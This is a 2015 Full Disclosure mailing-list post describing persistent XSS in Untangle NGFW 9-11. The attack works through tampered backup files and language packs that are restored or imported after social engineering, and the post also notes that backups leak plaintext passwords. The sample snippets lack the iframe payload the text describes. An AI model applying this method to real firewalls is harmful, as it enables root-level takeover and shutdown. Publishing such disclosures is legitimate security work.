Date: Tue, 28 Apr 2015 03:18:54 +0200
From: "Calum Hutton" <c.e.hutton@....com>
To: fulldisclosure@...lists.org
Cc: c.e.hutton@....com
Subject: [FD] [Additional vectors] Multiple vulnerabilities in Untangle NGFW
	9-11

This is a follow up to an earlier post, highlighting an XSS and information disclosure vulnerability in versions of Untangle 9-11

The previous post is shown in full below this post.

Additional un-patched vectors have been discovered that allow for these issues to be exploited with increased feasibility.

The vectors exist due to improper handling of uploaded files, and insufficient validation and sanitisation of their contents.

Two different types of file can be crafted to implement and incorporate the XSS payload highlighted in my previous post. Because the uploaded file/data integrity is not checked, the Untangle system will save the malicious data from the crafted file, allowing for persistent XSS that can perform actions as root, via the logged in users authenticated session and access to the Untangle JSON-RPC API. An example for each file type is shown below:

- Backup file

Untangle backup files are unencrypted tar gzip archives with a .backup file extension. Because these files are not encrypted, it is trivial to extract and view the file backup contents. This is a problem firstly because there is a huge amount of sensitive information disclosure in this archive, including the plaintext passwords of Local Directory users (as mentioned in my previous post). Secondly it means that it is easy to insert malicious data into the file, and then re-compress and craft the file to appear to be a normal backup file. Through social-engineering, an Admin user could restore from this malicious file. An example of the data to insert could be a fake malicious port forward rule:

This example adds an iframe in the description field of the port forward rule that causes the Untangle system to shut down when the port forward page is loaded - network.js

"portForwardRules": {
        "javaClass": "java.util.LinkedList",
        "list": [
            {
                "enabled": false,
                "javaClass": "com.untangle.uvm.network.PortForwardRule",
                "matchers": {
                    "javaClass": "java.util.LinkedList",
                    "list": []
                },
                "newDestination": "1.2.3.4",
                "ruleId": 1,
                "simple": false
            }
        ]
    },

- Language pack

Untangle language packs are unencrypted zip archives of various .po files that contain translation strings for the Untangle system. Because these are also unencrypted, and not checked for validity or sanitised, it means that it is easy to insert malicious data into the file, and then re-compress and craft the file to appear to be a normal language pack. Through social-engineering, an Admin user could import this malicious language pack into the system. An example of the data to insert is shown below:

This example adds an iframe in the left navigation bar of the web UI (About tab) that causes the Untangle system to shut down when any page is loaded - untangle-libuvm.po

#: ../servlets/webui/root/script/main.js:921
#: ../servlets/webui/root/script/config/about.js:16
#: ../servlets/webui/root/script/config/about.js:46
msgid "About"

CH